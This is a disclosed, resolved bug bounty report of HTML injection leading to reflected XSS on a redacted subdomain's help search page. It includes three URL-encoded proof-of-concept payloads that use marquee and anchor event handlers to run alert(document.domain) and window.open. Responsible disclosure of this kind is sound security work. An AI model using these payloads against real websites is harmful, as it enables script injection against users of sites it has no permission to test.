HTML Injection leads to XSS on███
Medium
Vulnerability Details
###Hello Team!
###I just found a HTML injection in subdomain████ that leads XSS with several payloads, let me show you the POC.
##POC 1 (Firefox 76)
█████
---
##POC 2 (Chrome 81)
███████
---
## Impact
An attacker could use the domain to trick users to execute malicious javascript code.
## Step-by-step Reproduction Instructions
* 1. Write the following URL :
```
https://███/help-leave/help/index.htm#rhsearch=%3Cmarquee%20loop=1%20onfinish=alert(document.domain)%3Etest%3C%2Fmarquee%3E&ux=search
```
* 2. With this payload you can inject links :
```
https://█████/help-leave/help/index.htm#rhsearch=%3Cmarquee%3E%3Cu%3E%3Ca%20href%3D%22http%3A%2F%2Fwww.google.com%22%20onmouseover%3Dalert(document.domain)%3EXSS%20HACKERONE%20%2F%20lemonoftroy%3C%2Fa%3E%3C%2Fmarquee%3E&ux=search
```
* 3. With this payload you can open a window:
```
https://█████/help-leave/help/index.htm#rhsearch=%3Cmarquee%3E%3Ca%20href=%22http://google.com%22%20onmouseover=window.open(%22https://www.google.com%22)%3Etest%20for%20hackerone%3C/marquee%3E&ux=search
```
##Browsers Verified In:
Firefox 76 / Chrome 81
Let me know if you can't reproduce the issue:
Regards
## Impact
XSS, Open Redirect.
Actions
View on HackerOneReport Stats
- Report ID: 874228
- State: Closed
- Substate: resolved
- Upvotes: 4